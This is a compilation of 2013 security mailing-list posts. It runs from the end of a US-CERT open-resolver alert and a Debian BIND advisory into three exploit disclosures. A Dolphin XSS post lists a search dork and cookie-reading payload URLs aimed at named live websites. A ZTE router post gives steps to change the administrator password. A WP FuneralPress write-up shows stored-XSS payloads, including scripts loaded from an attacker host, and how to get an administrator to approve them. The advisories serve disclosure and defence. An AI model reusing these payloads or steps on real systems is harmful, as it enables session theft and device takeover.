This option is currently not available for Microsoft DNS Server.

References

 * [1] Open DNS Resolver Project, http://openresolverproject.org/
 * [2] The Measurement Factory, "List Open Resolvers on Your Network",
http://dns.measurement-factory.com/cgi-bin/openresolverquery.pl
 * [3] The Measurement Factory, "Open Resolver Test",
http://dns.measurement-factory.com/cgi-bin/openresolvercheck.pl
 * [4] The Measurement Factory, "Open Resolvers for Each Autonomous
System", http://dns.measurement-factory.com/surveys/openresolvers/ASN-reports/latest.html
 * [5] "DNSInspect," DNSInspect.com, http://www.dnsinspect.com/
 * [6] RFC 1034: DOMAIN NAMES - CONCEPTS AND FACILITIES,
http://tools.ietf.org/html/rfc1034
 * [7] BCP 38: Network Ingress Filtering: Defeating Denial of Service
Attacks which employ IP Source Address Spoofing, http://tools.ietf.org/html/bcp38
 * [8] Chapter 3. Name Server Configuration,
http://ftp.isc.org/isc/bind9/cur/9.9/doc/arm/Bv9ARM.ch03.html#id2567992
 * [9] Disable recursion on the DNS server,
http://technet.microsoft.com/en-us/library/cc787602.aspx
 * [10] Chapter 7. BIND 9 Security Considerations,
http://ftp.isc.org/isc/bind9/cur/9.9/doc/arm/Bv9ARM.ch07.html#Access_Control_Lists
 * [11] Configure a DNS Server to Use Forwarders,
http://technet.microsoft.com/en-us/library/cc754941.aspx
 * [12] DNS Response Rate Limiting (DNS RRL),
http://ss.vix.su/~vixie/isc-tn-2012-1.txt
 * [13] Response Rate Limiting in the Domain Name System (DNS RRL),
http://www.redbarn.org/dns/ratelimits

Revision History

 * March 29, 2013: Initial release

____________________________________________________________________

   Produced by US-CERT, a government organization.
____________________________________________________________________

This product is provided subject to this Notification:
http://www.us-cert.gov/privacy/notification/

Privacy & Use policy:
http://www.us-cert.gov/privacy/

This document can also be found at
http://www.us-cert.gov/ncas/alerts/TA13-088A




[SECURITY] [DSA 2656-1] bind9 security update


- -------------------------------------------------------------------------
Debian Security Advisory DSA-2656-1                   security@debian.org
http://www.debian.org/security/                      Salvatore Bonaccorso
March 30, 2013                         http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : bind9
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2013-2266
Debian Bug     : 704174

Matthew Horsfall of Dyn, Inc. discovered that BIND, a DNS server, is
prone to a denial of service vulnerability. A remote attacker could use
this flaw to send a specially-crafted DNS query to named that, when
processed, would cause named to use an excessive amount of memory, or
possibly crash.

For the stable distribution (squeeze), this problem has been fixed in
version 1:9.7.3.dfsg-1~squeeze10.

For the testing distribution (wheezy), this problem has been fixed in
version 1:9.8.4.dfsg.P1-6+nmu1.

For the unstable distribution (sid), this problem has been fixed in
version 1:9.8.4.dfsg.P1-6+nmu1.

We recommend that you upgrade your bind9 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org

Dolphin v7.0 XSS Vulnerability

# Title : Dolphin v7.0 Cross Site Scripting Vulnerability
# Date: 2013-03-15
# Software Link: http://www.codeweblog.com/source/dolphin/nav.html?plugins/swfupload/swf/swfupload.js.source.html
# Credit: This Bug was found by Asesino04 "The Black Devils"
# Tested on: Windows XP SP2
# Category: [webapps]
# Dork : inurl:plugins/swfupload/swf/
# Special Thanks To : sH3LL05Dz & Lady NEXA & x3o-1337

# Please Like The New Fb page  : https://fb.com/Th3.Black.D3Vils
-----------


http://127.0.0.1/path/plugins/swfupload/swf/swfupload.swf?buttonText=[ XSS ]


# Demo :
http://www.gadgetcore.co.uk/CommunityCloud/plugins/swfupload/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E
https://www.healthyride.com/c/plugins/swfupload/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E
http://www.medicina312.kg/plugins/swfupload/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EClick%20me%3C/a%3E

-----------
Thanks To : | r0073r | KedAns-Dz | D4RKCR1PT3R | Keystr0ke | x3o-1337 | Èlite TrØjan | sH3LL05Dz
            | Ana Eve | DZ Combattant | Muhammad Talha Khan | r4dc0re | SeeMe CrosS | Zikou-16 | DaOne
            | Angel Injection | NuxbieCyber | Tibit | Sammy FORGIT | D4NB4R beBoss | LORDOFDARKNES
            | All Dz hackerz
-----------
 Contact:
# Fan Page : www.facebook.com/Th3.Black.D3Vils
# Youtube  : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email    : mr.k4rizma@gmail.com






ZTE ZXDSL 831IIV7 Privilege Escalation

# Title : ZTE ZXDSL 831IIV7 Privilege Escalation
# Date: 2013-03-15
# Credit: This Bug was found by Asesino04 "The Black Devils"
# Tested on: Windows XP SP2
# Category: [webapps]
# Dork :use shodanhq [ dsl router ]
# Special Thanks To : sH3LL05Dz & Lady NEXA & x3o-1337

# Please Like The New Fb page  : https://fb.com/Th3.Black.D3Vils
-----------
Overview of Device Information
This information reflects the current status of your DSL Router.

ADSL Port       Enabled

Downstream Line Rate    11998
Upstream Line Rate      985
LAN IP Address  192.168.1.1
Default Gateway        
Primary DNS Server      192.168.1.1
Secondary DNS Server    192.168.1.1
Ethernet MAC Address    00:22:93:9c:66:a7
Firmware Version        ZXDSL 831IIV7.5.0a_Z29_OV



--------how to exploit ----------------------

http://192.168.1.1/
login as user
then goes to this link
http://192.168.1.1/accessaccount2.html
here you'll find that you can only change the password of the user; change the link to

http://192.168.1.1/accessaccount.html
here you'll find how to change the password of the administrator

-----------
Thanks To : | r0073r | KedAns-Dz | D4RKCR1PT3R | Keystr0ke | x3o-1337 | Èlite TrØjan | sH3LL05Dz
            | Ana Eve | DZ Combattant | Muhammad Talha Khan | r4dc0re | SeeMe CrosS | Zikou-16 | DaOne
            | Angel Injection | NuxbieCyber | Tibit | Sammy FORGIT | D4NB4R beBoss | LORDOFDARKNES
            | All Dz hackerz
-----------
 Contact:
# Fan Page : www.facebook.com/Th3.Black.D3Vils
# Youtube  : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email    : mr.k4rizma@gmail.com






WP FuneralPress - Stored XSS in Guestbook


#
#
# WP FuneralPress - stored xss in guestbook
#
# "FuneralPress is an online website obituary management and guest book
program for funeral homes and cemeteries"
# http://wpfuneralpress.com/
#
# tested on: funeralpress version 1.1.6 / wordpress version 3.5.1
#
# impact:
#   malicious script execution as wordpress administrator
#
# author: robarmstrong.te71 () gmail com


# summary

A low-privilege or guest user can inject code via the
<textarea name="photo-message">, <textarea name="youtube-message"> and
<textarea name="message"> elements which are part of the wpfh_upload_form
form in http://site/obituaries/?id=[ID]&f=guestbook&m=add

Scripts injected via the "photo-message" and "youtube-message" elements
will be executed by the admin user when they browse to the guestbook admin
page at http://site/wp-admin/admin.php?page=wpfh-guestbook

If a malicious post is approved by the admin, the script will be run by
anyone viewing the guestbook.



# details

There appears to be some basic xss protection on form submissions using
<textarea name="message"> and code injected via this element is not served
up on the guestbook admin page.

Despite this, scripts injected via an iframe or embedded svg will be
executed by anyone viewing the guestbook at http://site/obituaries/?id=1&f=
guestbook on the condition that the post is approved by the site
administrator. The chances of an administrator approving a malicious
message are increased if some normal-looking text is inserted above the
malicious code, resulting in a legitimate looking "Message Preview" field
on the admin page.

## message post example:

    1. Attacker browses to:
http://site/obituaries/?id=1&f=guestbook&m=add and submits the form
with the following entered into
<textarea name="message" style="width:98%;height:170px" id="wpfh_message_textarea"></textarea> :

        Poor Peter was a fine old chap, such a pity he was eaten to death
by a pack of wild children.

        <IFRAME SRC="javascript:document.write('xss cookie: ' +
document.cookie);"></IFRAME>

        <EMBED SRC="
NtYXNjcmlwdCI+YWxlcnQoInhzcyBhbGVydCIpPC9zY3JpcHQ+PC9zdmc+Cg==" type="image/
svg+xml" AllowScriptAccess="always"></EMBED>

    2. Site administrator browses to http://site/wp-admin/admin.php?page=
wpfh-guestbook, sees an entry with a message preview that reads "Poor Peter
was a fine old chap..." and approves it.

    3. Anyone browsing to http://site/obituaries/?id=1+&f=guestbook will
execute the injected script



The xss flaws in <textarea name="photo-message"> and <textarea
name="youtube-message">
are more serious, as scripts injected here are served up to the admin user
when they attempt to approve the guestbook comments at http://site/wp
-admin/admin.php?page=wpfh-guestbook

As with the regular guestbook messages, if the admin approves a malicious
photo or youtube message the script will be executed by anyone browsing to
the guestbook.

## photo/youtube post example:

    1. Attacker hosts malicious javascript on another site:

        http://evilsite/fp.js :
            document.getElementById("topmenu").innerHTML="<h1>XSS</h1>";
//rewrite admin page

        http://evilsite/doc.js :
            document.write("document.write XSS");alert("XSS");

    2. Attacker browses to:
http://site/obituaries/?id=1&f=guestbook&m=add and selects either the
"Photo" or "Youtube" guestbook message option

    3. If Photo was selected, the attacker enters a path to a local image
in <input type="file" name="photo" id="wpfh_message_file">. Otherwise they
enter a Youtube link into <input type="text" name="youtube"
style="width:95%" id="wpfh_message_youtube" value="">

    4. Depending on which type of message was selected, the attacker
submits the form with the following entered into
<textarea style="width:100%;height:70px" name="photo-message"></textarea> or
<textarea style="width:100%;height:70px" name="youtube-message"></textarea> :

        <SCRIPT SRC=http://evilsite/fp.js></SCRIPT>
        <SCRIPT SRC=http://evilsite/doc.js></SCRIPT>

    5. The site administrator browses to http://site/wp-admin/admin.php
?page=wpfh-guestbook and the scripts that have been injected into <table
class="wp-list-table widefat fixed posts" cellspacing="0"> are executed:

        <td  style="background-color:#ffd1d1 !important" >
            <a href="http://www.youtube.com/watch?v=tsLkL8DTHeg"
target="_blank">View Video</a><br><SCRIPT SRC=http://evilsite/fp.js></SCRIPT>
            <SCRIPT SRC=http://evilsite/doc.js></SCRIPT>
        </td>



